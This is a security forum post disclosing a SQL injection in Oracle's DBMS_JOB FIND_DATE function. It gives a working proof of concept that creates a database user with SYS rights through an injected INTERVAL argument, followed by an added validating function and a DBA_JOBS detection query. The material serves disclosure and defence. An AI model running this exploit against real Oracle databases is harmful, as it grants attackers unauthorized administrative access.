Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
Database Security >> Database Security >> DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
(Message started by: Pete Finnigan on Apr 9th, 2010, 8:03am)

Title: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
Post by Pete Finnigan on Apr 9th, 2010, 8:03am

Code:
...
  CUR := DBMS_SQL.OPEN_CURSOR;
  BEGIN
    -- FIND_DATE: the caller-supplied INTERVAL string is concatenated
    -- straight into the statement text and then parsed.
    DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
                                ' from dual', DBMS_SQL.NATIVE );
...

FIND_DATE is not declared. I use the SUBMIT procedure to exploit the injection.


Code:
...
  -- SUBMIT: INTERVAL reaches FIND_DATE before WHAT is parsed.
  MYDATE := FIND_DATE(INTERVAL);
  IF NOT NO_PARSE THEN
    PARSE_JOB(WHAT);
  END IF;
...

1. Create function.

Code:
-- Invoker's-rights function with an autonomous transaction so the DDL
-- can commit on its own; it returns a VARCHAR2 so it can be used in a
-- WHERE clause of the injected statement.
CREATE OR REPLACE FUNCTION fff RETURN VARCHAR2
AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'create user fff identified by fff';
  COMMIT;
  RETURN 'sys';
END;
/


2. Exploit POC

Code:
DECLARE
  jobNo BINARY_INTEGER;
BEGIN
  jobNo := 4242;
  -- The INTERVAL argument completes the expression list of the generated
  -- SELECT, supplies its own FROM/WHERE so that sys.fff() is evaluated,
  -- and comments out the ' from dual' that FIND_DATE appends.
  dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),
                  'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
END;
/


DB Version: Oracle XE, Oracle 10gR2
The ISUBMIT procedure can be used as well.
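As an added example (not code from the original post), the following script shows what a validating counterpart to the concatenation in FIND_DATE looks like, runs the post's legitimate and injected INTERVAL strings through it, and finishes with a query over DBA_JOBS that flags already-submitted jobs carrying the same tokens. The function name safe_find_date and the -20001/-20002 error codes are my own; DBMS_SQL, REGEXP_LIKE and DBA_JOBS are standard Oracle 10g.

```sql
-- Added example, not part of the original post. Hypothetical names:
-- safe_find_date and the -20001/-20002 error codes. Everything else is
-- standard Oracle 10g PL/SQL (DBMS_SQL, REGEXP_LIKE, DBA_JOBS).
CREATE OR REPLACE FUNCTION safe_find_date(p_interval IN VARCHAR2)
  RETURN DATE
  AUTHID CURRENT_USER   -- evaluated as the caller, never as the package owner
IS
  l_cur   INTEGER;
  l_rows  INTEGER;
  l_now   DATE;
  l_next  DATE;
BEGIN
  -- An interval is a single date expression. Anything that can terminate
  -- the generated SELECT or bolt a clause onto it is refused before parsing:
  -- comment markers, statement separators and clause keywords. Quotes stay
  -- allowed because format masks such as 'MI' need them.
  IF p_interval IS NULL
     OR LENGTH(p_interval) > 200
     OR REGEXP_LIKE(p_interval, '--|/\*|;')
     OR REGEXP_LIKE(p_interval,
          '(^|[^[:alnum:]_$#])(from|where|union|select|into)([^[:alnum:]_$#]|$)', 'i')
  THEN
    RAISE_APPLICATION_ERROR(-20001, 'interval contains disallowed tokens');
  END IF;

  -- Same statement shape as the original FIND_DATE, but parsed with plain
  -- DBMS_SQL.PARSE under the caller's own rights.
  l_cur := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(l_cur, 'select sysdate, ' || p_interval || ' from dual',
                 DBMS_SQL.NATIVE);
  DBMS_SQL.DEFINE_COLUMN(l_cur, 1, l_now);
  DBMS_SQL.DEFINE_COLUMN(l_cur, 2, l_next);
  l_rows := DBMS_SQL.EXECUTE(l_cur);
  IF DBMS_SQL.FETCH_ROWS(l_cur) <> 1 THEN
    RAISE_APPLICATION_ERROR(-20002, 'interval did not evaluate to one row');
  END IF;
  DBMS_SQL.COLUMN_VALUE(l_cur, 1, l_now);
  DBMS_SQL.COLUMN_VALUE(l_cur, 2, l_next);
  DBMS_SQL.CLOSE_CURSOR(l_cur);

  -- A next run time that is not in the future is not an interval.
  IF l_next IS NULL OR l_next <= l_now THEN
    RAISE_APPLICATION_ERROR(-20002, 'interval must evaluate to a future date');
  END IF;
  RETURN l_next;
EXCEPTION
  WHEN OTHERS THEN
    IF l_cur IS NOT NULL AND DBMS_SQL.IS_OPEN(l_cur) THEN
      DBMS_SQL.CLOSE_CURSOR(l_cur);
    END IF;
    RAISE;
END safe_find_date;
/

-- The legitimate interval from the post's SUBMIT call evaluates normally.
SELECT safe_find_date('TRUNC(SYSDATE+(30/24/60),''MI'')') AS next_run
  FROM dual;

-- The injected interval from the POC is refused by the token check, so the
-- trailing "where chr(115)=sys.fff()" is never parsed or executed.
SELECT safe_find_date(
         'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --')
  FROM dual;

-- Detection: jobs already in the queue whose INTERVAL carries the same tokens.
SELECT job, log_user, priv_user, schema_user, what, interval
  FROM dba_jobs
 WHERE REGEXP_LIKE(interval, '--|/\*|;')
    OR REGEXP_LIKE(interval,
         '(^|[^[:alnum:]_$#])(from|where|union|select|into)([^[:alnum:]_$#]|$)', 'i');
```

The token check only controls the shape of the generated statement; an interval that is itself a function call (for example `some_pkg.f()`) is still a valid date expression and still gets evaluated, so the identity under which the text is parsed remains the real boundary. The original code hands that decision to DBMS_SYS_SQL.PARSE_AS_USER; the added function keeps it with the caller through AUTHID CURRENT_USER and plain DBMS_SQL.PARSE.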



Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board